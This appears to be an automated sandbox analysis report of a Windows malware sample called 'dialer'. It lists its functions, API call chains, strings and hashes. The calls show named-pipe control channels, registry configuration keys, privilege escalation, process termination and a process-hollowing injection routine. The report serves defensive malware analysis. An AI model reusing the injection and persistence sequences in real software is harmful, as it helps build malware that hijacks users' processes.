                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                    • String ID:
                                                                    • API String ID: 4084875642-0
                                                                    • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                    • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                    • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                    • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                    Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                    • String ID:
                                                                    • API String ID: 3197395349-0
                                                                    • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                    • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                    • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                    • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                    Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                    • String ID: .text$C:\Windows\System32\
                                                                    • API String ID: 2721474350-832442975
                                                                    • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                    • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                    • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                    • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                    Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                    • String ID: M$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2203880229-3489460547
                                                                    • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                    • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                    • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                    • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                    Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                    • String ID: \\.\pipe\dialercontrol_redirect64
                                                                    • API String ID: 2071455217-3440882674
                                                                    • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                    • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                    • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                    • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                    Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 SleepEx 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                    • String ID:
                                                                    • API String ID: 3676546796-0
                                                                    • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                    • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                    • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                    • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                    Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                    • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                      • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                      • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                      • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                      • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                      • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                      • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                      • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                      • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                      • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                      • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                    • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                    • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                    • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                    • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                    • String ID:
                                                                    • API String ID: 1323846700-0
                                                                    • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                    • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                    • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                    • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                    Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseHandleOpenWow64
                                                                    • String ID:
                                                                    • API String ID: 10462204-0
                                                                    • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                    • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                    • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                    • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                    Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                    APIs
                                                                      • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                      • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                      • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                      • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                      • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                      • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                      • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                      • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                      • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                      • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                      • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                      • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                      • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                      • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                      • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                      • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                    • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                    • String ID:
                                                                    • API String ID: 3836936051-0
                                                                    • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                    • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                    • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                    • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                    Non-executed Functions

                                                                    Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                    • String ID: SOFTWARE$dialerstager$open
                                                                    • API String ID: 3276259517-3931493855
                                                                    • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                    • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                    • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                    • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                    Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                    • String ID: @
                                                                    • API String ID: 3462610200-2766056989
                                                                    • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                    • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                    • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                    • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                    Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                    • String ID: dialersvc64
                                                                    • API String ID: 4184240511-3881820561
                                                                    • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                    • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                    • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                    • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                    Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: Delete$CloseEnumOpen
                                                                    • String ID: SOFTWARE\dialerconfig
                                                                    • API String ID: 3013565938-461861421
                                                                    • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                    • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                    • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                    • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                    Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: File$Write$CloseCreateHandle
                                                                    • String ID: \\.\pipe\dialercontrol_redirect64
                                                                    • API String ID: 148219782-3440882674
                                                                    • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
